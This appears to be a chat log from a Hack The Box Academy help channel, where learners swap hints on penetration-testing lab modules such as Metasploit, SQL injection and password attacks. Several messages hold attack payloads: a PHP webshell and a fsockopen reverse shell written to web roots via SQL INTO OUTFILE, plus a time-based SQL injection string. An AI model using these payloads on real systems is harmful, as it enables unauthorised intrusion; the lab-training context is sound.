The installed plugins are the exact same, and the parrot version is actually slightly behind the kali distro

You can change the metasploit prompt as well

how do

Check this https://malicious.link/post/2011/2011-10-09-msfconsole-prompt-fiddling/

is any of the staff aware of the state of the final challenge on the shells/payloads module? nomachine is literally unusable and the module needs to be completed for CPTS

Thanks, i'm trying to find where/why exactly this prompt is differing

I'm not sure I understand. The reason the msf prompt differs is the same reason the bash / zsh prompt differs

Like, i'm trying to see why the prompt shows the current jobs and agents in the parrot OS msfconsole, and the kali one doesnt. Because i'd like to do that with my kali machine. But i'm not seeing any config files that would cause that to change, like msfconsole.rc for example

I get it now. I don't have an answer for it unfortunately. I looked around my kali machine and didn't find any .rc files that could indicate which one is used for the prompt. I don't have a parrot os but I'll try the one on htb

Cool beans. Let me know if you see anything

Can't find where it's set on the parrot vm either. The prompt on the parrot vm is just a basic [msf](Jobs:%J Agents:%S). I guess the colours come from the terminal / shell, not from metasploit

I'm interested to know where/when it's set as well, let me know if you happen to find out

I'll take a look in a few and let you know, @solar granite

Active Directory Enumeration and Attacks Skills 1; I got the Kerberoastable users password but not sure how to get to MS01 any help? I’ve also been trying to interact with the sql instance with no success

Password attacks lab - medium :after getting access to user D need hint to go to root

check out the key

i cant cat the SSH key for the root

@wind gust see if you can download it on your machine

mhmmm im getting perm denied

uhhh are all of the targets in the metasploit module unreachable???

Day 7 - Almost Day 8! Boss Up! NoMoRelapsesTrustMe!!!!!!

make sure your local directory is writable. You should be able to copy that file over

but how when i dont have access to /root/.ssh

but you have access to D

Hi man, can you help me with the previous question about Will credentials I’m stuck ?

Hi everyone ! if someone can help on the module « Password attacks » I’m stuck with the Will and Kira credentials. I tried few things but nothing seems to happen

dm me

so guys i finished file inclusion module , which one should i start
tier 0

probably file transfer

Can someone message me the command injection skills assesment injection? I know which request, tried all the parameters with payloads that bypass the filter, but still no go

goodevening

I am working on the network enumeration with nmap and I have tried to spoof an IP, however this is the result: nmap 10.129.2.48 -sS -Pn -n -p 53 -S 10.129.2.200 -e tun0
Starting Nmap 7.92 ( https://nmap.org ) at 2022-10-05 21:58 CEST
setup_target: failed to determine route to 10.129.2.48
WARNING: No targets were specified, so 0 hosts scanned.
Nmap done: 0 IP addresses (0 hosts up) scanned in 0.02 seconds

Why can't nmap determine a route?

Are you connected to the VPN? Have you confirmed by checking your ip addr of the tun0 interface

tun0: flags=4305<UP,POINTOPOINT,RUNNING,NOARP,MULTICAST> mtu 1500
inet 10.10.15.56 netmask 255.255.254.0 destination 10.10.15.56
inet6 dead:beef:2::1136 prefixlen 64 scopeid 0x0<global>
inet6 fe80::41bb:72f5:e03b:4ef1 prefixlen 64 scopeid 0x20<link>
unspec 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00 txqueuelen 500 (UNSPEC)
RX packets 7455 bytes 413059 (403.3 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 19760 bytes 951509 (929.2 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

yes

what is output of "route -n" command

Kernel IP routing table
Destination Gateway Genmask Flags Metric Ref Use Iface
0.0.0.0 192.168.6.2 0.0.0.0 UG 100 0 0 eth0
10.10.10.0 10.10.14.1 255.255.254.0 UG 0 0 0 tun0
10.10.14.0 0.0.0.0 255.255.254.0 U 0 0 0 tun0
10.129.0.0 10.10.14.1 255.255.0.0 UG 0 0 0 tun0

I'm pretty sure that looks good, so maybe something to do with nmap

okay, thx for helping me checking

People say the -S isn't working right with HTB, maybe there is an alternative

Hi, anyone know how to resolve active subdomain enumeration, it in "Information gathering web edition" i'm stuck in there and idk what i have to do

we need to do a ||zone transfer with dig||

Hey guys

quick questions

working on web services & API attacks - LFI

What cheet's use for it?

I don't understand how to find the existing user on the server whose name starts with Ub

okay so we can use the LFI vulnerability to read the /etc/passwd file

oooh got you

yep it has all the users 😉

I was thinking of searching a file names users

thanks m8

it feels so good reading the passwd file

yikes

sure

hew guys can anybody help me with the shell and payload live engagement i m one the last host-3. i found that was vulnerable to ms17-010 however when i try to get a meterpreter it keeps failing , i also found that i can upload aspx files directly to the host from the web so i thought of getting a webshell but still nothing

Hi guys! Can someone help me? Need a nudge on Attacking Common Services - Attacking SQL Databases. In the second question is asked:

What is the password for the "mssqlsvc" user?

Looked everywhere in the databases but didn't find nothing

you check sys.sql_logins?

otherwise mssql is pretty infamous for providing routes to getting shell, so its possible they want you to go that route. But havnt done that specific module myself yet so Im just spitballing

hint try the method in ||Capture MSSQL Service Hash|| in that section

yeah i sometime also got that issue and there is an exploit for that vuln in the metasploit but instead of a shell it just run a command try that and just read flag

shoot me a dm if you still need help with that

I'm working on footprinting medium and i've || mounted the nfs, but I can see that the permissions require me to be root. How do I open the folder as root? I've tried sudo cd, but that doesn't work. or do I need to be logged into root? ||

use sudo su

Thanks, I just found out I forgot the password to my root user account on this vm 🤦‍♂️

thanks @vital adder what you proposed worked. But i have some questions, when we use this technique the NTLM hash we intercept is the account used by the service right?

If we had for example SSH service available in the target, would it be possible to ssh with the service account?

if that service account is a user and have ssh enable on the target machine then i think yes

Hi, I need just a little help with this module: https://academy.hackthebox.com/module/77/section/843

I am not sure what it wants me to do beyond searching for the exploit

it want the flag

ik

but how am I supposed to go about that?

so you need the find the exploit and exploit the target machine

well, I can't connect to the target

through metasploit

which is what it goes over

but I don't think it actually wants me to use metasploit

I think it was just going over the basic functions of it

that's what I get when I use searchsploit

for the service running on the server

you can still use metasploit for this if you want but you need to set the rhost and the rport right

so, how do I set the RHOST for this?

WAIT

sorry

didn't see the RPORT

and ofc I would set the LHOST as well?

nope

okay

thanks, the module failed to mention to set the RPORT

but I should have known

yeah but if this is just some other module then i get why it don't need to show you how to set everything but this is a module for beginner

yeah, it is a beginner module

also, after using the exploit

thats the path it goes to

and thats the objective

so where would I find the flag.txt file?

yeah.. the objective is to get the flag at /flag on the target system and the place that the out put was save it is a metasploit thing

first did you set the exploit to get the flag at /flag.txt ? if you did then the flag is at the saved location

how would I do that? I was not instructed on that

so in that exploit the FILEPATH is the file that the exploit going to get, the default is /etc/passwd change this to /flag.txt

also you can only find this options in the advanced menu but you can use set verbose true for the exploit to just print out the file that it get

okay

I am setting everything again

Listen man listen

Can anyone here track my ip without me clicking anything

thanks, I am writing this stuff down

it worked

Hey all, need some direction on Attacking Common Services Easy Skill assessment?

anyone know how to resolve active subdomain enumeration from information gathering

i'm stuck in find "TXT record as the answer" and anther point to resolve it

hint do ||dns zone transfer|| on the main domain and dump the txt record of the subdomain that have the same ip as the ||ns|| subdomain

what is the issue if you still need help with that?

@vital adder can I DM?

sure

i can't found it

and don't reponse it

if you need pic tell me and type yoy on DM

i was helping the other guy if you still need help shoot me a dm with that screenshot

Hey, has anyone completed the skills assessment for Command Injection? I’m a little stuck. I thought I constructed the perfect injection after writing several notes on the possible command that is used in the backend, but after trying it along with multiple canned payloads from PATT via Burpsuite, I still get “Malicious request denied!” in the response. Please @ me when you reply to my message

Need Help - Skills Assessment - SQL Injection Fundamentals

hi @sturdy igloo @mortal nova what did you try and what is the issue?

i figured it out. thanks for reaching out so fast

nice

use psexec version of eternal blue explot. Also make sure you turn off vpn firewalls and potentially even your own network or device firewall. a lot of times vpn, proxies, tunnels and firewalls can interfere with metasploit payloads. You can also try encoding your payload in base64 or other encoding method to make sure it doesn't get altered as its going over the interwebs.

@mortal nova use this https://github.com/josemlwdf/1nj3ct0r search my post here about it. I found the answer in no time just fuzzing those payloads. Besides you can type any command chain between "" and get the payloads for it

could someone help me with the 'Footprinting - Easy' assessment. I was able to download available files from the users ftp.. but when trying to specifically use the keys, nothing seems to be working.

oh wait that's weird you should be able to login via ssh with the key you found

yeah its strange, im still getting "Permission Denied (publickey)"

what permission did you give that key on your machine?

I assigned it 655, but now I just tried to assign 600, and it works.. Man, this is like the 3rd time, I've been stuck and everytime you respond, I figure it out right away.. I got the flag now for this one. Thanks for confirming that I was on the right path

Use NSE and its scripts to find the flag that one of the services contain and submit it as the answer. I saw somewhere that the answer is in http-enum after using aggressive scan but I don't know how to use that information

pls help

,

nvm i found it

thanks

Attacking Metasploitable 3 [Lab]

Scan the target machine with nmap

Open your terminal
Run nmap -v -p 1-65535 -sV -O -sS -T4 target_IP -oG Metaspoitable3.txt
Review the results

For this module, we will be attacking Metasploitable 3 (198.18.100.107

) for our lab. This requires critical thinking and will not be explicitly explained.

We will be using the same target as last week, but this time we will be attacking it.
Do not use only metasploit, find the exploit in searchsploit and attempt to use the exploit script.
Screenshot your successful attempts with both metasploit and the exploit scripts.
Comment on the discussion board about how it felt when you got your first shell on a vulnerable system.

Metasploit is already installed and can be run with:

Open the terminal
Type msfconsole
Then type search "exploit name" (without the quotes)

Here's my results from my nmap scan

I wanted to try an ftp exploit so I found this through Searchsploit first but I don't know how to run it in the terminal, even after I installed tftp

For Metasploit, I found a number of exploits that were rated as excellent for FTP. On the list modules 107, 108, 118, 141 and 174 are all unix/linux exploits which I believe are appropriate seeing how the computer is running ubuntu 14.04. My issue is I don't know how to run these exploits in the terminal either or how to configure the proper payload. There's over 948 payloads and I know that there's certain ones that are compatible with the unix/linux exploits. I'm not sure which ones though and I've searched the internet for the right ones.

As of now I'm stuck on this lab. I've searched for FTP exploits and found some more info such as a brute force attack or the anonymous exploitation. I'm a bit overwhelmed with where to start or if I should be looking at a different exploit other than FTP such as http or mySQL. Any help would be greatly appreciated as I am a complete novice at this.

exploits are version specific

you have the ftp version there, search for specifically that one

if theres a known exploit for it, then youll stumble across it. if there isnt, then you can try some generic attacks against ftp like checking for anon logins, or pick a different service.

good evening all, working on intro to python 3, stuck on code block 2 in the first set of questions

i've tried indexing where D, C, B, A and that was wrong

do i only have the instances so lagging now?

Hello, can I get a nudge on the Skill Assessment 1 for Common Web Apps? I know what is vulnerable but struggling on getting a foothold

Morning all,
i cant seem to access the assessment page. i have refreshed servers many times now and no change. VPN connects fine. Is it down or something?
https://academy.hackthebox.com/module/103/section/1011

Why has my nmap -p- -sV {ip} taken over 2 hours 😭

youre doing all the ports on an ip. depending on how the server is configured it could take DAYS.

Narrow down your search

im just doing what the htb walkthrough did

refresh the server?

and restart the nmap?

refreshing the server is likely to give you a new IP so yeah.

Hmmm okay, i will try, thank you

unless you are looking for filtered ports.. use --open on the end.

im on the redeemer module thing, if you know?

easier to link me via dm.

okay, will do

Need some help with sql injection fundamentals skills assessment. I managed to ||get an sql shell via sqlmap||, but I can't write any files. I ||checked the permissions|| and everything seems fine, but it errors out: ||select '<?php system($_REQUEST[0]); ?>' into outfile '/var/www/html/shell.php'|| ||execution of non-query SQL statements is only available when stacked queries are supported||

I also found the db creds for the root account, but I can't find the port to login.

nah... no matter what i do the server dies almost 5 minutes in.......

http://10.129.182.217/assessment/

ideas please?

VPN is fine. PwnBox is fine.

both have the same issue

Hint for that you have to just guess the vuln because the directory that have vuln even though it's there but it's still give you 404 when trying to access it

Which module is this? I'm not on PC so I can't check right now

xss assessment

Hint you don't have write permission in that directory but check what else are in there
also don't cheat and use sqlmap!! Do SQL injection like the rest of us

Try a hard refresh with ctrl+shift+R (I think) and after the target spawn refresh the web one more time

When I have the same issue that seem to work for me

will try shortly. ta

nah. almost immediately times out.

oh lastly i did saw some people also complain about this and if you keep getting that issue i think you should report it to support

Examine the target and find out the password of the user Will. Then, submit the password as the answer.

Can anyone help me with this?

this is from credential hunting in linux

I'm stuck, unable to get remote execution on beginner/netmon... EDIT: nvm i accidentally duplicated a noti instead 🙄

which module is that?

pls include the module name next time but hint read the hint and ||mutated version|| of that password

noicu

Hi guys! Could someone help me with Attacking Common Services - Easy? I can't seem to bruteforce the SMTP server.

I'm using the users.list from the resource section

Thank you! Will check this out after work today

you are on the right path first you need to get the username with the tool ||smtp-user-enum|| show in previous section and when you get the username and are brute forcing for the password remember to use the full mail address

Hey @vital adder may i DM you?

sure

I tried doing it by hand but I couldn't get it to work. Even sqlmap got a very weird payload format to bypass login

Blind sql injection is much harder to do by hand

oh you sqlmap don't need to bypass login

this isn't actually Blind injection because you can still see the error and the output

How? All I ever saw was Incorrect credentials. Please don't tell me the actual thing is on a subdomain..

oh nope there are no subdomain

for this after login you don't have cookie or anything so i think it's server side stuff so sqlmap going to be a bit tricky

Ye the payloads are horrible. They look like ||' AND (SELECT 8326 FROM (SELECT(SLEEP(1)))MBtj) AND 'qJhW'='qJhW||, no idea how are we supposed to find it by hand

oh sqlmap is going to use some weird payload and that payload doesn't even have anything to do with the actual payload

and also if you don't login it will redirect you back to the login page so if you setup sqlmap incorrectly sqlmap will trying to do some sql injection in the login page

Hey, module Documenting & Reporting. This question.... I am stucked... haha, can't google something or just type in incorrect format)

but this doesn't look like a login bypass payload (at least i don't think so) so i think you did setup sqlmap correctly but i'm not 100%

but you can find the almost right payload in the cheat sheet also in previous section

Cool, I'll try that later. And how do I go about the writing a shell? For the file writing privs I got ||SELECT variable_name, variable_value FROM information_schema.global_variables where variable_name="secure_file_priv": 'SECURE_FILE_PRIV'||, which I assumed means ||I can write anywhere||

prefix + [Shift] + [%], idk why that doesn't work
[prefix] + [Shift] + [%] doen't work too, as well

for both writing a shell and checking privs you can find both payload in the sheat sheet try them all

i didn't finish that module but i just finish that question and a hint for that is there ||4 key||

ah, yeah, it works, thanks

Hello everyone 😄.. did anyone know what is the name of the auto tool that includes nmap gobuster fuff and more.. all in one tool

I have seen it in YouTube tow days ago but unfortunate I didn't recognize the name of the tool and I couldn't find that video again

im going to tell you a secret. (dont tell anyone else) You need to learn to use each tool from the command line individually. You need to understand what the tools are doing, how they are used and when to use them.

Automatic tools (even amazing tools like Burp) miss things that you can only find by manually crawling systems for misconfigurations.

I know that buddy but we need to make things faster and easier

if you really want to do the bare minimum... i guess you could try some vuln scanners like OpenVAS....... though, i find them to be superficial at best and largely pointless as they miss a shit ton.

Thanks a lot for the reply!

maybe you mean autorecon

Nop it much advanced than autorecon

It has GUI also

YouTube has view history you can check

(if you were logged in)

@lapis pivot

Hi again. I've found a ||search field after logging in|| which is vulnerable to ||union injections||, and I can do it manually, with no delay. I can load files, but I still can't seem to write files. I checked the privs and SECURE_FILE_PRIV is still ||empty||

for the checking privs part i did use SECURE_FILE_PRIV and i'm not sure if that will work but check some the command for privs in the cheat sheat

none of my attempts over the last 5 hours to get a reverse shell through powershell on the Netmon target have worked. I can't even query the target box and get it to write something to file- attempting to run Get-LocalUser > users.txt creates the file but its empty... EDIT: finally got it. turns out || the prtg ps script requires three parameters or it errors out, and generally just seems very finicky about cmd (parameter) format||

is there a decent module checkpoint to hit where prottey much all of the information for the comptia securtiy+ is covered by? or would it be best to just find another way to study for the test specifically and keep going through the HTB modules?

security+ is a much different beast

okay, so just find another way to study for it? any recommendations for where i could do it for cheap?

Hello how are you guys

Need help SQLMap - What's the contents of table flag3? (Case #3)

i keep getting a flag that is not accepted

Hi guys! Been having some trouble uploading a rev shell to C:\xampp\htdocs, always get a SQL Syntax error but can't seem to find what i'm writing wrong

Using the command: SELECT "<?php -r '$sock=fsockopen("IP", Port);exec("sh <&3 >&3 2>&3");?>'" INTO OUTFILE 'C:\xampp\htdocs\shell.php'

Upload simple shell like cmd shell

Inject cmd shell ,after upload revers shell

I actually have a cmd shell, but can only run dir there

Any module leaning

hey man can i dm you?

nevermind, figured it out

Stuck in the linux privilege escalation challenge can't get to flag 4, can someone help ?

think i missed something on the Credential Hunting in Linux module as process would of taken too long without checking hint.. anyone i can DM to confirm?

sure shoot me a dm if you still need help with that

so did you exploit the external services like the hint said?

Anyone else able to spawn a VM instance? Says nome are available to me.

htb having issues atm

might be a go outside and touch grass day

spawn target or spawn pwnbox?

Spawn pwnbox.

so right now i can't spawn the target and the pwnbox on htb academy and on the normal htb

Yes I am getting errors spawning PwnBox, they must be doing maintenance

oh wait my target just work

same here, can't spawn pwnbox

Aw, fair enough.

Hopefully they will be back soon, would love to continue to grind out the JPT path to get to take the new exam offered.

Digital ocean is doing maintenance in their uk data center

(Digital ocean hosts pwnbox)

F

Hi can someone help me with the shoppy machine 🙂 pls

Nah i explored the services but did not find anything, can u send me the vulnerable one in pm?

Hey guys

someone who can give a hand with the web services & api skill assessment

Script:

Output:

hint there are vuln to exploit in one of the service you need to find the ||cred||

sure can you send me your script?

4sure

Did you ever figure this out?

Hey i'm having some trouble with this question in the footprinting module smtp section: Enumerate the SMTP service even further and find the username that exists on the system. Submit it as the answer.

I've try connecting with telnet and using VRFY but I don't find anything

i've also try smtp-enum-users.nse with nmap and i found nothing

@maiden field use Metasploit

I could but I want to use the intended way for this section

Ok

the first thing to learn about academy modules is they lie to you

its perfectly acceptable and sometimes encouraged/expected to use tools other than what is explicitly in the module

might not be the case for that specific module, but point being dont fret about using alt methods to get the answer

yeah but idc I know theres a "normal way" for this section thats what the hint says

in that one i used 2 tools

Hi, I am definitely overthinking this one, and the answer to my question will be stupidly obvious, but... I am doing the Vulnerability Assessment module Nessus Skill Assessment, and there is this instruction to "Authenticate to <target IP> with user "htb-student" and password <PASS>". How do I perform a nessus scan on another host that is predefined in the module, that only the <target> can reach, and the only port open on <target> is 22 ssh?

metasploit is totaly fine

replace the localhost with the given ip

@tranquil urchin

That makes a lot of sense, thank you!

Hi, I have a little problems with last question in Web Enum Skill Assessment. I was tried to brute using gobuster, but probably I use wrong word list

@quasi moth whats the module name?

Information Gathering web edition

read the hint

Sublist3r -d githubapp.com -b doesn't help

oh wait you can't use directory brute force when you don't have permission it's can be DOS for a small side web server

and i think that subdomain is removed

btw i found that subdomain searching at google

@quasi moth #modules message

https://subdomainfinder.c99.nl/scans/2021-03-16/githubapp.com

@quasi moth

Thanks, but I already find out there

nice

Thanks for the tip

just went through it and yeah can confirm this is one of the 'lies to you' modules. The method for completing it isnt stated in the module at all. Also youre supposed to use a specific wordlist they provide to you in the little resources button at the top of the module. Super easy to overlook.

in the footprinting medium lab, i mounted the file system, see the tickets, found a username and password but it is wrong?!

that's mean...

can anyone help me to figure out what i did wrong with my payload and why it says Document.write at the top? Im in the XSS phishing module

hi everyone! I'm getting a weird error when im trying to connect to the academy vpn in my kali vm

can anyone help?